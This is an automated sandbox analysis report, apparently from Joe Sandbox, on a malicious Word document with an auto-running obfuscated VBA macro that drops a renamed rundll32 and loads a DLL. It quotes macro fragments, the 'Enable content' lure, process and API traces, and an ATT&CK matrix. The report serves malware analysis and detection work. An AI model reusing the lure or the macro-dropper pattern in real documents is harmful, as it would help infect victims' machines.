Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://roaming.edog.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://settings.outlook.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://tasks.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3A11B302-44CB-4EB9-BCB8-49C2BE307D7C.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

Source: global traffic

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8	Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". W L 'd"" - '0 - a" 4 At-
Source: Screenshot number: 8	Screenshot OCR: Enable content". W L 'd"" - '0 - a" 4 At- B I y " " A, " ;Z 'tyles ,uaM "" " Page1 of 1 30 wo

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Jump to dropped file

Document contains an embedded VBA macro with suspicious strings

Source: airequipmentcorp-doc-08.11.2022.doc	OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: airequipmentcorp-doc-08.11.2022.doc	OLE, VBA macro line: Set = CallByName((ufVM1s65i("AzhECiJUk2")), ufVM1s65i("bYZwWl"), VbGet, ufVM1s65i("cR3qp4Grta"))
Source: airequipmentcorp-doc-08.11.2022.doc	OLE, VBA macro line: Set = CallByName((), ufVM1s65i("QaSy54aHeh"), VbGet, )
Source: airequipmentcorp-doc-08.11.2022.doc	OLE, VBA macro line: Set = CallByName((), ufVM1s65i("NZpkQxhY7T"), VbGet, )
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE, VBA macro line: Set = CallByName((ufVM1s65i("AzhECiJUk2")), ufVM1s65i("bYZwWl"), VbGet, ufVM1s65i("cR3qp4Grta"))
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE, VBA macro line: Set = CallByName((), ufVM1s65i("QaSy54aHeh"), VbGet, )
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE, VBA macro line: Set = CallByName((), ufVM1s65i("NZpkQxhY7T"), VbGet, )

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01004C9B

2_2_01004C9B

Source: airequipmentcorp-doc-08.11.2022.doc	OLE, VBA macro line: Private Sub Document_Open()
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE, VBA macro line: Private Sub Document_Open()

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01003F00 NtQuerySystemInformation,	2_2_01003F00
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01005D14 NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	2_2_01005D14
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01003F9E HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	2_2_01003F9E
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01005C96 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	2_2_01005C96

Source: ~DF32F8B01FD4175FF7.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: rECA2.tmp.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rECA2.tmp.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: rECA2.tmp.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Section loaded: wmi.dll

Jump to behavior

Source: airequipmentcorp-doc-08.11.2022.doc	OLE indicator, VBA macros: true
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE indicator, VBA macros: true

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe 4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE

Source: airequipmentcorp-doc-08.11.2022.doc	Virustotal: Detection: 24%
Source: airequipmentcorp-doc-08.11.2022.doc	ReversingLabs: Detection: 15%

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe "C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe "C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1	Jump to behavior

Source: airequipmentcorp-doc-08.11.2022.doc.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\airequipmentcorp-doc-08.11.2022.doc

Source: airequipmentcorp-doc-08.11.2022.doc

OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{AE3085A9-7AA4-45D1-A34F-1D0E8511FD2C} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal92.expl.winDOC@4/14@0/1

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01003590 SHSetThreadRef,CoCreateInstance,SHSetThreadRef,

2_2_01003590

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01003A94 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,

2_2_01003A94

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Command line argument: WLDP.DLL		2_2_01003F9E
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Command line argument: localserver		2_2_01003F9E

Source: airequipmentcorp-doc-08.11.2022.doc	OLE document summary: title field not present or empty
Source: airequipmentcorp-doc-08.11.2022.doc	OLE document summary: author field not present or empty
Source: airequipmentcorp-doc-08.11.2022.doc	OLE document summary: edited time not present or 0
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE document summary: title field not present or empty
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE document summary: author field not present or empty
Source: ~DF32F8B01FD4175FF7.TMP.0.dr	OLE document summary: edited time not present or 0

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: airequipmentcorp-doc-08.11.2022.doc

Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: airequipmentcorp-doc-08.11.2022.doc

Static file information: File size 2297841 > 1048576

Source:	Binary string: rundll32.pdb source: rECA2.tmp.exe, rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr
Source:	Binary string: rundll32.pdbGCTL source: rECA2.tmp.exe, 00000002.00000000.272138035.0000000001001000.00000020.00000001.01000000.00000003.sdmp, rECA2.tmp.exe.0.dr

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01006989 push ecx; ret		2_2_0100699C
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_010068E0 push ecx; ret		2_2_010068F3

Source: rECA2.tmp.exe.0.dr

Static PE information: section name: .didat

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

File opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

File opened: PHYSICALDRIVE0

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01002512 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

2_2_01002512

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01002D7A GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

2_2_01002D7A

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01003D9F mov esi, dword ptr fs:[00000030h]

2_2_01003D9F

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01006580 SetUnhandledExceptionFilter,		2_2_01006580
Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe	Code function: 2_2_01006232 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		2_2_01006232

Source: C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

Code function: 2_2_01006783 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_01006783

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Scripting	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	4 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	42 Exploitation for Client Execution	Logon Script (Windows)	1 Extra Window Memory Injection	2 Virtualization/Sandbox Evasion	Security Account Manager	2 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	12 Scripting	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
